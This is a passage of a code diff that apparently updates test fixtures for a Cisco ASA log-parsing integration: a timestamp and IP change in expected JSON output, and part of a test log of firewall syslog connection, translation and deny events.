"event": { "severity": 1, - "ingested": "2021-07-19T09:06:01.498801541Z", - "original": "Aug 6 2020 11:01:38: %ASA-1-106103: access-list filter denied icmp for user joe inside/10.1.2.3(64321) -\u003e outside/1.2.33.40(8080) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]", + "ingested": "2021-12-09T13:31:35.036879900Z", + "original": "Aug 6 2020 11:01:38: %ASA-1-106103: access-list filter denied icmp for user joe inside/10.1.2.3(64321) -\u003e outside/81.2.69.144(8080) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]", "code": "106103", "kind": "event", "action": "firewall-rule", diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa.log b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa.log index 9f0a0b8b598..5d21ffa5a9f 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa.log +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa.log @@ -1,268 +1,268 @@ -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:100.66.98.44/8256 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:100.66.205.104/80 (100.66.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:100.66.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:100.66.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:100.66.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:100.66.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:100.66.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:100.66.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:100.66.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:100.66.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:100.66.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:100.66.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:100.66.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:100.66.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:100.66.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:100.66.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:100.66.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:100.66.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:100.66.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1188 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:100.66.80.32/53 (100.66.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:100.66.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:100.66.252.6/53 (100.66.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:100.66.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:100.66.98.44/8257 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:100.66.98.44/8258 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:100.66.238.126/53 (100.66.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:100.66.93.51/53 (100.66.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:100.66.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:100.66.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:100.66.98.44/8259 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:100.66.225.103/443 (100.66.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1189 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:100.66.240.126/53 (100.66.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:100.66.44.45/53 (100.66.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:100.66.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:100.66.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:100.66.98.44/8265 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:100.66.179.219/80 (100.66.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:100.66.157.232/53 (100.66.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:100.66.178.133/53 (100.66.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:100.66.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:100.66.98.44/8266 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:100.66.133.112/80 (100.66.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:100.66.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:100.66.204.197/53 (100.66.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:100.66.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:100.66.1.107/53 (100.66.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:100.66.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:100.66.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:100.66.192.44/80 (100.66.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:100.66.98.44/8277 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:100.66.19.254/80 (100.66.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:100.66.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:100.66.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:100.66.98.44/8278 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:100.66.115.46/80 (100.66.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:100.66.98.44/8279 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1190 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:100.66.14.30/53 (100.66.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:100.66.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:100.66.252.210/53 (100.66.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:100.66.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:100.66.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:100.66.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:100.66.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:100.66.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:100.66.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:100.66.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:100.66.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:100.66.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:100.66.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:100.66.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:100.66.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:100.66.100.107/53 (100.66.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:100.66.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:100.66.104.8/53 (100.66.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:100.66.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:100.66.98.44/8293 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:100.66.123.191/80 (100.66.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:100.66.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:100.66.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 -Oct 10 2018 12:34:56 